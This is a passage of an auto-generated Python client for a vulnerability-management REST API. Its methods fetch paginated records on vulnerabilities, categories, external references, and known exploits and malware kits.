:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability(self, id, **kwargs): # noqa: E501
"""Vulnerability # noqa: E501
Returns the details for a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: Vulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability # noqa: E501
Returns the details for a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: Vulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Vulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_categories(self, **kwargs): # noqa: E501
"""Categories # noqa: E501
Returns all vulnerabilities categories that can be assigned to a vulnerability. These categories group and label vulnerabilities by general purpose, affected systems, vendor, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_categories(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_categories_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_categories_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerability_categories_with_http_info(self, **kwargs): # noqa: E501
"""Categories # noqa: E501
Returns all vulnerabilities categories that can be assigned to a vulnerability. These categories group and label vulnerabilities by general purpose, affected systems, vendor, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_categories_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_categories" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerabilityCategory', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_category(self, id, **kwargs): # noqa: E501
"""Category # noqa: E501
Returns the details for a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: VulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_category_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_category_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_category_with_http_info(self, id, **kwargs): # noqa: E501
"""Category # noqa: E501
Returns the details for a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: VulnerabilityCategory
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_category" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_category`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VulnerabilityCategory', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_category_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Category Vulnerabilities # noqa: E501
Returns hypermedia links to the vulnerabilities that are in a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_category_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_category_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_category_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Category Vulnerabilities # noqa: E501
Returns hypermedia links to the vulnerabilities that are in a vulnerability category. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_category_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability category. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_category_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_category_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_categories/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_exploits(self, id, **kwargs): # noqa: E501
"""Vulnerability Exploits # noqa: E501
Returns the exploits that can be used to exploit a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_exploits(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_exploits_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_exploits_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_exploits_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Exploits # noqa: E501
Returns the exploits that can be used to exploit a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_exploits_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_exploits" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_exploits`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/exploits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfExploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_malware_kits(self, id, **kwargs): # noqa: E501
"""Vulnerability Malware Kits # noqa: E501
Returns the malware kits that are known to be used to exploit the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_malware_kits(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_malware_kits_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_malware_kits_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_malware_kits_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Malware Kits # noqa: E501
Returns the malware kits that are known to be used to exploit the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_malware_kits_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_malware_kits" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_malware_kits`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/malware_kits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfMalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_reference(self, id, **kwargs): # noqa: E501
"""Reference # noqa: E501
Returns an external vulnerability reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:return: VulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_reference_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_reference_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_reference_with_http_info(self, id, **kwargs): # noqa: E501
"""Reference # noqa: E501
Returns an external vulnerability reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the vulnerability reference. (required)
:return: VulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_reference" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_reference`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_reference_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Reference Vulnerabilities # noqa: E501
Returns the vulnerabilities that are referenced by an external reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: id (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_reference_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_reference_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_reference_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Reference Vulnerabilities # noqa: E501
Returns the vulnerabilities that are referenced by an external reference. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_reference_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: id (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_reference_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_reference_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerability', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_references(self, **kwargs): # noqa: E501
"""References # noqa: E501
Returns the external references that may be associated to a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_references_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_references_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerability_references_with_http_info(self, **kwargs): # noqa: E501
"""References # noqa: E501
Returns the external references that may be associated to a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_references" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerability_references', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfVulnerabilityReference', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerability_references1(self, id, **kwargs): # noqa: E501
"""Vulnerability References # noqa: E501
Returns the external references that may be associated to a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerability_references1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_vulnerability_references1_with_http_info(id, **kwargs) # noqa: E501
return data
def get_vulnerability_references1_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability References # noqa: E501
Returns the external references that may be associated to a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerability_references1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerabilityReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerability_references1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_vulnerability_references1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
